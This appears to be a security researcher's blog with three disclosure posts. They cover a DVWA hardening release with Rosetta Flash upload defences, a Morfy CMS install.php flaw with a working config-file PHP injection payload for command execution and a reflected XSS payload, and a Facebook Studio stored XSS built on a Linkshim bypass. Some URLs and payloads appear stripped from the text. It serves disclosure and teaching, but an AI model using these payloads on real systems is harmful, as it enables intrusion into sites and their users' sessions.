Chrismas Gift: A better & safer DVWA (to all!)

9:55 AM

Thanks to me, DVWA have been facing some unintended security abuse, including a very severe & unintended remote command execution. This one was the most severe of all the unintended bugs I discovered in DVWA. Using this, just because you have DVWA installed and your server is running, anybody can execute a command on your box using a CSRF (yeah, I know how weird that might sound for some of you, long story short it was nasty).
Not yet pulled at github, but for now, it can be downloaded at dropbox!

So I contacted RandomStorm & Ryan Dewhurst (Original author of DVWA). And, after further review, we concluded that DVWA high level should no longer be considered safe. Since it is supposed to teach developers the safest way of basic web app security, and it didn’t (it did at one point). But within time, security grows and multiple attack vectors rise such as the Rosetta Flash.

Mainly targeting to fix the RCE by deploying an anti-CSRF token, I started the project with a colleague. Then we got time, so what the hell, fixed a bunch of other bugs (only in the high level, since that’s what’s supposed to be secured), and changed the graphics to a hacker-friendly design. We fixed a bunch of unintended bugs in the high level and in the site itself, mostly file manipulation included.

In case you didn’t check out my first post about most of the issues, I won’t (re?)cover them here. Check them out at here.

In this post I will mention the not-so-popular yet deadly dangerous bug “Rosetta Flash”. On ‘most’ upload forms,

This vulnerability allows an attacker read the client side source code of a website from a different origin (say and then look for potentially sensitive data in those pages for example - CSRF prevention tokens and then successfully mount a side-wide CSRF attack.

Flash’s weird problem(?) - Attacking

   An attacker creates a malicious Flash (SWF) file
    The attacker changes the file extension to JPG
    The attacker uploads the file to
    The attacker embeds the file on using an embed tag with type “application/x-shockwave-flash

    The victim visits, loads the file as embedded with the tag
    The attacker can now send and receive arbitrary requests to using the victims session
    The attacker sends a request to and extracts the CSRF token from the response or read messages or perform any action. (regardless of Content-Type)”

We fixed this simply by deploying a Content-Disposition-header and a confirmation wheater the uploaded file was really an image and not a flash or any other format by using getimagesize() & imagecreatefromjpeg() also, an X-Content-Type: nosniff header to not let Internet explorer confuse the file as an invalid data and sniff its contents as text/html (could be abused to create a persistent XSS).

If your upload script looks like the one in DVWA, check out the new version (more to talk about). The others include giving the uploaded files random names, or it might result XSS and in some cases file inclusion when files names like “../../../config.php%0.0shit.jpg” got uploaded.


Overtime, old security becomes a joke.
& Happy Holidays!


Morfy CMS Multiple Vulnerabilities

11:19 AM


Executing Commands like a Boss! (*cough cough*)

Versions <= 1.0.5 are vulnerable to the following attacks if certain requirements fulfill

1.       Remote Command Execution

Vulnerable Code
./install.php Line 57

                $post_site_url = isset($_POST['site_url']) ? $_POST['site_url'] : '';

./install.php Line 64-77

                file_put_contents('config.php', "<?php
    return array(
        'site_url' => '{$post_site_url}',
        'site_charset' => 'UTF-8',
        'site_timezone' => '{$post_site_timezone}',
        'site_theme' => 'default',
        'site_title' => '{$post_site_title}',
        'site_description' => '{$post_site_description}',
        'site_keywords' => '{$post_site_keywords}',
        'email' => '{$post_email}',
        'plugins' => array(
        ),    );");

The problem is that it adds multiple unsanitized user input inside a php configuration file (config.php)

Exploitation: goto install.php?

 Add}','yibelo'=> eval("system('dir');"),// as your website

This will store the following in config.php

return array(
        'site_url' => '{}','yibelo'=> eval("system('dir');"),// ',
        'site_charset' => 'UTF-8',
        'site_timezone' => '{$post_site_timezone}',
        'site_theme' => 'default',
        'site_title' => '{$post_site_title}',
        'site_description' => '{$post_site_description}',
        'site_keywords' => '{$post_site_keywords}',
        'email' => '{$post_email}',
        'plugins' => array(
        ),    );");

Then navigate to then system(‘dir’); (list of files in current directory) will be displayed

2.       Cross Site Scripting

Vulnerable Code
./install.php Line 14
$site_url = 'http://'.$_SERVER["SERVER_NAME"].$port.str_replace(array("index.php", "install.php"), "", $_SERVER['PHP_SELF']);
./install.php Line 20
$rewrite_base = str_replace(array("index.php", "install.php"), "", $_SERVER['PHP_SELF']);
./install.php Line 226
<input type="text" name="site_url" class="form-control" id="site_url" placeholder="Enter Site Url" value="<?php echo $site_url; ?>">

Send a GET request payload like

Will output

<input type="text" name="site_url" class="form-control" id="site_url" placeholder="Enter Site Url" value="”><svg/onload=confirm(1)>

And a reflective XSS shall occur if install.php isn't removed.

Vulnerable? The easiest fix (for both issues) will be to remove install.php the second you finished installing morfy.

Another one for the f*** sakes!

2014-10-12 – Contacted Developers (no reply)
2014-11-00 – Another attempt to contact developers (no reply)
2014-12-17 – Public Disclosure.


XSS Bug on Facebook Studio

8:41 AM


This is a cool Second-Order-Injection XSS against Facebook Studio that was caused by data input on Facebook Mobile (Facebook Studio).

This vulnerability is created because of improper user input parsing. First, I noticed doesn’t use Linkshim (malicious link detection system for Facebook). When I saw that, I immediately wrote to Facebook about it. But then I realized, this is not exploitable because it fetches the URL’s from My Facebook profile. Take: is a site blocked by Linkshim.

Meaning, if I add “” as my website on Facebook, it will be fetched to my Studios account. which means, there needs to be no linkshim because it was first checked on Facebook.

Linkshim uses a list of sites to identify if the site is malicious or not. So bypassing basically includes cheating the linkshim into thinking our site is not included. As always, I started with case-sensetivity bypasses, hoping, if is blocked, to bypass it with, it obviously didn't work.

Then I tried URL encoding. There is a value in html called shy. That basically, shies/hides elements. This tag can be used in href elements. So <a href=”evil&shy;” >X</a> is equvallent to so all I had to do is add evil&shy; as my website using the mobile interface of Facebook (since the main site sends requests to verify, and the mobile version doesn’t)

So when Facebook studio fetches my URL from my Facebook profile and add it in href tag (hoping it is a safe link checked by Linkshim, and it is), it will become “<a href=”evil&shy;” >X</a>” when clicked redirects to, which is considered a linkshim evasion.

Seeing the source, I then wondered why &shy; still itself and not encoded. So I tried my chance with”><script>alert(0);</script> but that link become

<a href=””” target=’_’ >X</a>
It basically means, the inputs < , >, /  and anything following them is filtered. So I tried event handler XSS’es since quotes aren’t blocked with payloads like 

So that will be rendered as
<a href=””onmouseover=”alert(1); //&shy;.” target=’_’ >X</a>
The bad news is I can’t make it self-executable even using autofocus and onfocus because it is href attribute. So I tried ways of making this self-executable. Then, I  use CSS to make the font very big, so it will fill the screen. So onmouseover will automatically get it triggered because the mouse will be all over it. Note: since it’s a URL for Facebook, no spaces were allowed. 

That was the final payload I added to my Facebook account, as my website. The problem with Facebook was that when adding it to the database, I don’t know why Facebook didn’t html entity it. So when Studio featched the contents, it became

And creating us a nice self executing XSS.

Nov 22, 2014 7:12am - Notified Facebook
Nov 24, 2014 1:30pm - Facebook Notified its out of scope
Dec 2, 2014 10:42am - Issue got fixed.
Dec 9, 2014 08:03am - Public Disclosure


No matter where the source is, do not trust user input data even while fetching it from a trusted source.